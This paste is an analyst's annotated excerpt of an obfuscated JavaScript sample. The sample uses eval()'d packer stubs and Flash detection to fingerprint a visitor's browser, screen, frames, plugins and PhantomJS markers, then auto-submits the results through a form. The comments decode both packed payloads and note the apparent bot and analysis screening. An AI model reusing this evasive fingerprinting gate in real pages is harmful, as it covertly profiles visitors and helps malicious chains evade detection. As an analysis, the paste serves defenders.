MalwareBreakdown

JavaScript

Feb 19th, 2017
  1. // this is an excerpt of the script tags in the original JS file
  2. // mainly to focus on the 'body' of the JS
  3.  
  4. mTop = top; // implicit global (no var) holding the top-level window; not referenced again in this excerpt
  5. mSelf = self; // implicit global holding the current window; not referenced again in this excerpt
  6. submited = false; // implicit global run-once flag (spelling as in the sample), checked and set inside submit()
  7.  
  8. function submit() {
  9. // one-shot collector: gathers browser/environment values into page elements, then submits the form with id "submit-form"
  10. if (submited) {
  11. return false;
  12. }
  13. // first call only from here on; any later call (for example through submitByTimeout()) returns false above
  14. submited = true;
  15.  
  16. // eval() of a "p,a,c,k,e,d"-style packer stub: the anonymous function below only rebuilds and returns source text, and eval() then executes that text (an analyst can print the returned string instead of evaluating it)
  17. eval( // broken down for ease of viewing
  18. // parameters: p = packed source whose word tokens are indexes written in base 'a', a = radix, c = number of dictionary words, k = word dictionary, e = passed as 0 and reassigned inside to the index encoder, d = empty lookup object
  19. function(p,a,c,k,e,d){
  20. // encoder: turns an index into its token text
  21. e=function(c){
  22. return c.toString(36)
  23. };
  24. // feature test: the condition is true when String.prototype.replace accepts a function as replacement; the fast path below then decodes p in a single regex pass
  25. if(!''.replace(/^/,String)){
  26. while(c--){
  27. d[c.toString(a)]=k[c]||c.toString(a)
  28. }
  29. // d now maps token -> word (an empty dictionary slot maps the token to itself); k is swapped for a one-element list holding the lookup callback
  30. k=[function(e){
  31. return d[e]
  32. }];
  33. // e now returns a pattern matching any word, and c = 1 makes the loop below run exactly once
  34. e=function(){
  35. return'\\w+'
  36. };
  37.  
  38. c=1
  39. };
  40. // substitution: replace word tokens in p with dictionary entries (one pass in the fast path, otherwise one pass per non-empty dictionary word)
  41. while(c--){
  42. if(k[c]){
  43. p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  44. }
  45. }
  46. return p
  47. } // end of function 'packed'
  48. // below are the input parameters for the function
  49. // each occupying a single line to show what input belongs to which parameter
  50. ('c a;c b;c 6;l(9 4.k!=\'8\'){a=4.k;b=4.m}i l(9 3.5!=\'8\'&&9 3.5.7!=\'8\'&&3.5.7!=0){a=3.5.7;b=3.5.g}i{a=3.j(\'h\')[0].7;b=3.j(\'h\')[0].g}o{6=4.n!==4.q?1:0}p(e){6=2}3.d(\'a\').f=a;3.d(\'b\').f=b;3.d(\'6\').f=6;',
  51. 27,
  52. 27,
  53. '|||document|window|documentElement|ix|clientWidth|undefined|typeof|||var|getElementById||value|clientHeight|body|else|getElementsByTagName|innerWidth|if|innerHeight|self|try|catch|top'.split('|'),
  54. 0,
  55. {}) // this is the end of the input parameters
  56. ); // end the eval() statement
  57. // decoded with the dictionary above, payload 1 writes the viewport width and height to the elements with ids 'a' and 'b' (window.innerWidth/innerHeight, else documentElement clientWidth/clientHeight, else the first body element's)
  58. // and sets the element with id 'ix' to 1 when window.self !== window.top (the page is framed), 0 when it is not, and 2 when that comparison throws
  59. // plain-text Flash detection follows: 'flash' ends as 0 (no major version found), 1 (FlashDetect.major > 0) or 2 (detection threw)
  60. var flash = 0;
  61. try {
  62. var FlashDetect=new function(){
  63. var self=this; // shadows the global 'self' for the rest of this constructor
  64. self.installed=false;
  65. self.raw="";
  66. self.major=-1;
  67. self.minor=-1;
  68. self.revision=-1;
  69. self.revisionStr="";
  70. var activeXDetectRules=[
  71. // activeXDetection rules
  72. // an array of objects, each with a ProgID "name" and a "version" function; the ".6" rule starts from the default "6,0,21", sets AllowScriptAccess="always" and swallows any error before returning
  73. {"name":"ShockwaveFlash.ShockwaveFlash.7","version":function(obj){return getActiveXVersion(obj);}},
  74. {"name":"ShockwaveFlash.ShockwaveFlash.6","version":function(obj){var version="6,0,21";try{obj.AllowScriptAccess="always";version=getActiveXVersion(obj);}catch(err){}
  75. return version;}},
  76. {"name":"ShockwaveFlash.ShockwaveFlash","version":function(obj){return getActiveXVersion(obj);}}
  77. ];
  78.  
  79. // takes the ActiveX object and returns the result of its GetVariable("$version") call, or -1 when that call throws
  80. var getActiveXVersion=function(activeXObj){
  81. var version=-1;
  82. try{
  83. version=activeXObj.GetVariable("$version");
  84. }catch(err){}
  85. return version;
  86. }; // end getActiveXVersion function
  87.  
  88. // creates the ActiveX object for the given ProgID name; on failure returns the marker object {activeXError:true} instead of throwing
  89. var getActiveXObject=function(name){
  90. var obj=-1;
  91. try{
  92. obj=new ActiveXObject(name);
  93. }catch(err){
  94. obj={activeXError:true};
  95. }
  96. return obj;
  97. }; // end getActiveXObject function
  98.  
  99. // parses the ActiveX version string; the indexing assumes a shape like "<platform> <major>,<minor>,<revision>,..." (inferred from the split calls, not shown on the page)
  100. // returns one object with the keys raw, major, minor, revision and revisionStr
  101. var parseActiveXVersion=function(str){
  102. var versionArray=str.split(",");
  103. return{"raw":str,"major":parseInt(versionArray[0].split(" ")[1],10),"minor":parseInt(versionArray[1],10),"revision":parseInt(versionArray[2],10),"revisionStr":versionArray[2]}; // end return
  104. }; // end parseActiveXVersion function
  105.  
  106. // parses the plugin description string: the third space-separated part is read as "<major>.<minor>" and the fourth as the revision string (shape inferred from the indexing)
  107. // returns one object with the keys raw, major, minor, revisionStr and revision
  108. var parseStandardVersion=function(str){
  109. var descParts=str.split(/ +/);
  110. var majorMinor=descParts[2].split(/\./);
  111. var revisionStr=descParts[3];
  112. return{"raw":str,"major":parseInt(majorMinor[0],10),"minor":parseInt(majorMinor[1],10),"revisionStr":revisionStr,"revision":parseRevisionStrToInt(revisionStr)}; // end return
  113. }; // end parseStandardVersion function
  114.  
  115. // strips ASCII letters from the revision string and parses the rest as a base-10 integer
  116. // because of the '||', a parsed result of 0 or NaN falls back to the current self.revision
  117. var parseRevisionStrToInt=function(str){
  118. return parseInt(str.replace(/[a-zA-Z]/g,""),10)||self.revision;
  119. }; // end parseRevisionsStrToInt function
  120.  
  121. // accepts the version as input
  122. // returns true if the detected major version is greater than or equal to the input version, otherwise false
  123. self.majorAtLeast=function(version){
  124. return self.major>=version;
  125. }; // end majorAtLeast function
  126.  
  127. // accepts the version as input
  128. // returns true if the detected minor version is greater than or equal to the input version, otherwise false
  129. self.minorAtLeast=function(version){
  130. return self.minor>=version;
  131. }; // end minorAtLeast function
  132.  
  133. // accepts the version as input
  134. // returns true if the detected revision number is greater than or equal to the input version, otherwise false
  135. self.revisionAtLeast=function(version){
  136. return self.revision>=version;
  137. }; // end revisionAtLeast function
  138.  
  139. // declared with one parameter but reads 'arguments', so up to three values (major, minor, revision) are compared; with no arguments the loop never runs and the result is undefined
  140. self.versionAtLeast=function(major){
  141. // list of the detected major version, minor version and revision number
  142. var properties=[self.major,self.minor,self.revision];
  143.  
  144. // number of positions to compare: the shorter of 'properties' and 'arguments'
  145. var len=Math.min(properties.length,arguments.length);
  146.  
  147. // iterate through the lists (stopping at the shorter list's length); 'i' is not declared with var here, so it is an implicit global
  148. for(i=0;i<len;i++){
  149. // tests whether the value at this index of 'properties' is greater than or equal to the value at the same index of 'arguments'
  150. if(properties[i]>=arguments[i]){
  151. // if the two values are equal and another position remains, move on to compare the next position
  152. if(i+1<len&&properties[i]==arguments[i]){
  153. continue;
  154. // otherwise 'properties' is greater at this position, or equal at the last compared position: return true
  155. } else {
  156. return true;
  157. } // end inner if-else statement
  158. // the value in 'properties' is less than the one in 'arguments' (also reached when the comparison involves NaN): return false
  159. } else {
  160. return false;
  161. } // end outer if-else statement
  162. } // end for-loop
  163. }; // end versionAtLeast function
  164. // detection routine; the trailing "()" after its closing brace runs it immediately, so self.FlashDetect itself ends up holding the call's return value (undefined)
  165. // branch 1: navigator.plugins is non-empty -> parse the enabled plugin's description for MIME type application/x-shockwave-flash; branch 2: appVersion lacks "Mac" and window.execScript exists (an Internet Explorer API) -> try each ProgID in activeXDetectRules until one yields a version
  166. self.FlashDetect=function(){
  167. if(navigator.plugins&&navigator.plugins.length>0){
  168. var type='application/x-shockwave-flash';
  169. var mimeTypes=navigator.mimeTypes;
  170. if(mimeTypes&&mimeTypes[type]&&mimeTypes[type].enabledPlugin&&mimeTypes[type].enabledPlugin.description){
  171. var version=mimeTypes[type].enabledPlugin.description;
  172. var versionObj=parseStandardVersion(version);
  173. self.raw=versionObj.raw;
  174. self.major=versionObj.major;
  175. self.minor=versionObj.minor;
  176. self.revisionStr=versionObj.revisionStr;
  177. self.revision=versionObj.revision;
  178. self.installed=true;
  179. }
  180. } else if(navigator.appVersion.indexOf("Mac")==-1&&window.execScript){
  181. var version=-1;
  182. for(var i=0;i<activeXDetectRules.length&&version==-1;i++){
  183. var obj=getActiveXObject(activeXDetectRules[i].name);
  184. if(!obj.activeXError){
  185. self.installed=true;
  186. version=activeXDetectRules[i].version(obj);
  187. if(version!=-1){
  188. var versionObj=parseActiveXVersion(version);
  189. self.raw=versionObj.raw;
  190. self.major=versionObj.major;
  191. self.minor=versionObj.minor;
  192. self.revision=versionObj.revision;
  193. self.revisionStr=versionObj.revisionStr;
  194. } // of if statement for 'version != -1'
  195. } // end of if statement for 'not activeXError'
  196. } // end of for-loop
  197. } // end of outermost if-elseif statement
  198. }(); // end FlashDetect constructor, no input parameters are passed
  199. }; // end the FlashDetect class
  200.  
  201. if (FlashDetect.major > 0) {
  202. flash = 1;
  203. }
  204. } catch (e) {
  205. flash = 2;
  206. } // end major try-catch block
  207. // report the Flash result (0, 1 or 2) in the element with id "fs"
  208. window.document.getElementById("fs").value=flash;
  209.  
  210. // second eval() of a packer stub; same scheme as the first, but with radix 62 and 145 dictionary words
  211. eval( // broken down for ease of viewing
  212. function(p,a,c,k,e,d){
  213. e=function(c){
  214. return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
  215. };
  216. if(!''.replace(/^/,String)){
  217. while(c--){
  218. d[e(c)]=k[c]||e(c)
  219. }
  220.  
  221. k=[function(e){
  222. return d[e]
  223. }];
  224.  
  225. e=function(){
  226. return'\\w+'
  227. };
  228.  
  229. c=1
  230. };
  231. // the encoder above writes indexes with the digits 0-9, a-z, then A-Z (index 62 becomes "10"); the substitution loop is the same as in the first stub
  232. while(c--){
  233. if(k[c]){
  234. p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  235. }
  236. }
  237.  
  238. return p
  239. } // end of function 'packed'
  240. // below are the input parameters for the function
  241. // each occupying a single line to show what input belongs to which parameter
  242. ('b 4={};8{4.17=n.1b.1p;4.R=n.1b.1p}5(e){4.17=-1;4.R=-1}8{4.S=n.1u;4.X=n.1r}5(e){4.S=-1;4.X=-1}8{4.V=n.1O;4.T=n.1N}5(e){4.V=-1;4.T=-1}8{4.Q=n.1M;4.14=n.1K}5(e){4.Q=-1;4.14=-1}8{4.Y=n.1B.1C.z}5(e){4.Y=-1}8{4.15=f.1D.1A}5(e){4.15=\'-\'}8{4.1j=f.1z}5(e){4.1j=\'-\'}8{4.19=(!(v.G 1w 1x)||v.G.z==0)?0:1}5(e){4.19=-1}8{4.18=n.1y||n.1E}5(e){4.18=\'-\'}8{4.11=1k(v.1F)==="h"?1:0}5(e){4.11=-1}8{4.P=1k(v.1v)!=="1J"?1:0}5(e){4.P=-1}4.H=0;8{b 13=1f h(){b 9=1G;9.N=1c;9.w="";9.p=-1;9.s=-1;9.q=-1;9.r="";b L=[{"C":"A.A.7","c":h(l){m K(l)}},{"C":"A.A.6","c":h(l){b c="6,0,21";8{l.1H="1I";c=K(l)}5(O){}m c}},{"C":"A.A","c":h(l){m K(l)}}];b K=h(1e){b c=-1;8{c=1e.1t("$c")}5(O){}m c};b 1i=h(C){b l=-1;8{l=1f 1q(C)}5(O){l={1n:F}}m l};b 1l=h(t){b D=t.I(",");m{"w":t,"p":B(D[0].I(" ")[1],10),"s":B(D[1],10),"q":B(D[2],10),"r":D[2]}};b 1g=h(t){b 1a=t.I(/ +/);b 16=1a[2].I(/\\./);b r=1a[3];m{"w":t,"p":B(16[0],10),"s":B(16[1],10),"r":r,"q":1o(r)}};b 1o=h(t){m B(t.1s(/[a-1L-Z]/g,""),10)||9.q};9.2f=h(c){m 9.p>=c};9.2g=h(c){m 9.s>=c};9.2e=h(c){m 9.q>=c};9.2d=h(p){b J=[9.p,9.s,9.q];b 12=2a.2b(J.z,M.z);1m(i=0;i<12;i++){u(J[i]>=M[i]){u(i+1<12&&J[i]==M[i]){2i}W{m F}}W{m 1c}}};9.13=h(){u(v.G&&v.G.z>0){b E=\'1P/x-2c-2h\';b y=v.y;u(y&&y[E]&&y[E].U&&y[E].U.1d){b c=y[E].U.1d;b o=1g(c);9.w=o.w;9.p=o.p;9.s=o.s;9.r=o.r;9.q=o.q;9.N=F}}W u(v.2k.2j("29")==-1&&n.1V){b c=-1;1m(b i=0;i<L.z&&c==-1;i++){b l=1i(L[i].C);u(!l.1n){9.N=F;c=L[i].c(l);u(c!=-1){b o=1l(c);9.w=o.w;9.p=o.p;9.s=o.s;9.q=o.q;9.r=o.r}}}}}()};u(13.p>0){4.H=1}}5(e){4.H=2}8{1h(4)}5(e){};h 1h(d){8{f.k(\'1Y\').j=d.17}5(e){}8{f.k(\'1Z\').j=d.R}5(e){}8{f.k(\'26\').j=d.S}5(e){}8{f.k(\'27\').j=d.X}5(e){}8{f.k(\'25\').j=d.V}5(e){}8{f.k(\'24\').j=d.T}5(e){}8{f.k(\'20\').j=d.Q}5(e){}8{f.k(\'22\').j=d.14}5(e){}8{f.k(\'23\').j=d.Y}5(e){}8{f.k(\'1S\').j=d.15}5(e){}8{f.k(\'1R\').j=d.19}5(e){}8{f.k(\'1Q\').j=d.18}5(e){}8{f.k(\'1T\').j=d.11}5(e){}8{f.k(\'1U\').j=d.P}5(e){}8{f.k(\'1X\').j=d.1W}5(e){}8{f.k(\'28\').j=d.H}5(e){}};',
  243. 62,
  244. 145,
  245. '||||QC|catch|||try|self||var|version|||document||function||value|getElementById|obj|return|window|versionObj|major|revision|revisionStr|minor|str|if|navigator|raw||mimeTypes|length|ShockwaveFlash|parseInt|name|versionArray|type|true|plugins|CF|split|properties|getActiveXVersion|activeXDetectRules|arguments|installed|err|NG|WIW|SH|WX|WH|enabledPlugin|WW|else|WY|WFC|||NB|len|FlashDetect|WIH|PL|majorMinor|SW|PT|NP|descParts|screen|false|description|activeXObj|new|parseStandardVersion|QCDone|getActiveXObject|RF|typeof|parseActiveXVersion|for|activeXError|parseRevisionStrToInt|width|ActiveXObject|screenY|replace|GetVariable|screenX|geolocation|instanceof|PluginArray|callPhantom|referrer|href|top|frames|location|_phantom|sendBeacon|this|AllowScriptAccess|always|undefined|innerHeight|zA|innerWidth|outerHeight|outerWidth|application|ci_PT|ci_NP|ci_PL|ci_NB|ci_NG|execScript|DM|ci_DM|ci_SW|ci_SH|ci_WIW||ci_WIH|ci_WFC|ci_WH|ci_WW|ci_WX|ci_WY|ci_CF|Mac|Math|min|shockwave|versionAtLeast|revisionAtLeast|majorAtLeast|minorAtLeast|flash|continue|indexOf|appVersion'.split('|'),
  246. 0,
  247. {}) // end of FlashFunction input parameters
  248. ) // end of second eval() function
  249. // decoded with the dictionary above, payload 2 fills an object QC and passes it to QCDone(), which copies each value into the element with id "ci_<key>":
  250. //   SW and SH (both read window.screen.width in the packed text), WX/WY (window.screenX/screenY), WW/WH (outerWidth/outerHeight), WIW/WIH (innerWidth/innerHeight), WFC (window.top.frames.length),
  251. //   PL (document.location.href), RF (document.referrer; QCDone has no ci_RF write), NP (1 when navigator.plugins is a non-empty PluginArray, else 0), PT (window.callPhantom || window._phantom),
  252. //   NB (1 when navigator.sendBeacon is a function), NG (1 when navigator.geolocation is defined), CF (a packed copy of the FlashDetect logic above: 0/1/2), DM (copied to ci_DM but never set on QC in the packed text)
  253. // every read is wrapped in try/catch with -1 or '-' as fallback; the frame-count and callPhantom/_phantom checks look like screening for framed or PhantomJS-driven sessions (analyst inference), and the ci_* ids are distinctive strings of this sample
  254. // submit the form element data
  255. window.document.getElementById("submit-form").submit();
  256. } // end function submit()
  257.  
  258. // sets the value of the element with id "timeout" to 1, then runs submit(); no caller is visible in this excerpt (presumably a timer set up elsewhere in the page; confirm against the full file)
  259. function submitByTimeout(){
  260. window.document.getElementById("timeout").value=1; // marks that the submission came through the timeout path
  261. submit(); // returns false without doing anything if submit() has already run once
  262. }
  263.  
  264. // call submit() as soon as this script is evaluated; the run-once flag makes any later call return false
  265. submit();